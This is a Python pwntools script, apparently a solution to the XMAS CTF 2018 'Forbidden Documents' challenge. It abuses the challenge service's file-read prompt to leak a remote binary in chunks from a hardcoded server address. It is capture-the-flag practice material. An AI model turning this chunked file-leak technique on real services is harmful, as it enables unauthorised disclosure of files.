A python script used to retrieve the binary executable of CTF challenge "Forbidden Documents" - XMAS CTF 2018
from pwn import *
from sys import argv
import re
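def get_chunk(name, size, offset):
    """Fetch one chunk of a remote file from the challenge service.

    A fresh connection is opened for every call. The request consists of
    four lines: the file name, a literal ``y``, the chunk size and the
    offset. Everything received after the ``Content: `` marker, until the
    peer closes the connection, is treated as the chunk.

    Args:
        name: File name, sent as the first line.
        size: Chunk size, sent as the third line (str or int).
        offset: Offset, sent as the fourth line (str or int).

    Returns:
        The received data with every CRLF pair collapsed to LF, or the
        sentinel string ``"ERROR"`` if any step raised an exception.
    """
    conn = None
    try:
        conn = remote("199.247.6.180", 10004)
        payload = "{}\ny\n{}\n{}\n".format(name, size, offset)
        # sendline() appends one more newline after the payload.
        conn.sendline(payload)
        conn.recvuntil("Content: ")
        data = conn.recvall()
        # NOTE(review): presumably undoes an LF -> CRLF translation applied
        # on the service side -- confirm against the service output.
        return data.replace("\x0d\x0a", "\x0a")
    except Exception as e:
        print(e)
        return "ERROR"
    finally:
        # Close the connection on the failure path too; the original only
        # closed it when every step had succeeded.
        if conn is not None:
            conn.close()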
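def main():
    """Dump a remote file chunk by chunk into ``./output/<basename>``.

    Command line: ``<name_of_file> <size_chunk>``.

    Each offset is fetched twice. If both copies are identical, the chunk is
    appended and the offset advances by its length. If they differ, only the
    common prefix is kept and the dump stops (presumably the service returns
    unstable bytes past the end of the file -- confirm). The dump also stops
    after ten consecutive all-zero chunks, or when a chunk cannot be fetched
    after ten attempts.

    The saved file is exactly what the remote service returned and should be
    handled as untrusted input.
    """
    import os  # local import: only ``argv`` is imported from ``sys`` at file level

    if len(argv) != 3:
        # ``argv`` is the name this file imports explicitly; ``sys`` is only
        # in scope if the ``pwn`` star import happens to export it.
        print("Usage: {} <name_of_file> <size_chunk>".format(argv[0]))
        exit(0)

    name = argv[1]
    size_chunk = argv[2]
    offset = 0
    data = ""
    counter = 0  # consecutive all-zero chunks seen so far

    while counter < 10:
        print("Getting {} bytes at offset {}...".format(size_chunk, offset))

        fetched = False
        for _ in range(10):
            print("Getting both chunks...")
            data1 = get_chunk(name, size_chunk, offset)
            data2 = get_chunk(name, size_chunk, offset)
            # Compare against the sentinel exactly: a substring test would
            # misread any chunk that merely contains the bytes "ERROR".
            if data1 != "ERROR" and data2 != "ERROR":
                fetched = True
                break
        if not fetched:
            # Do not append the "ERROR" sentinel to the dump.
            print("[-] Giving up at offset {} after repeated errors".format(offset))
            break

        if data1 == data2:
            if data1 == '\x00' * len(data1):
                counter += 1
                print("Counter of zero sections: {}".format(counter))
            else:
                counter = 0
            data += data1
            offset += len(data1)
        else:
            print("[+] Reached EOF")
            # Keep only the prefix on which both copies agree. The original
            # sliced with the comprehension's leaked loop variable, which is
            # always the last index, and indexed past the shorter copy.
            limit = min(len(data1), len(data2))
            first_diff = next(
                (i for i in range(limit) if data1[i] != data2[i]), limit
            )
            data += data1[:first_diff]
            break

    # Drop any directory part so the file is created directly under ./output.
    name = name.rsplit('/', 1)[-1]
    if not os.path.isdir("./output"):
        os.makedirs("./output")
    with open("./output/{}".format(name), 'wb') as f:
        f.write(data)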
# Run the dump only when executed as a script, not when imported.
if __name__ == "__main__":
    main()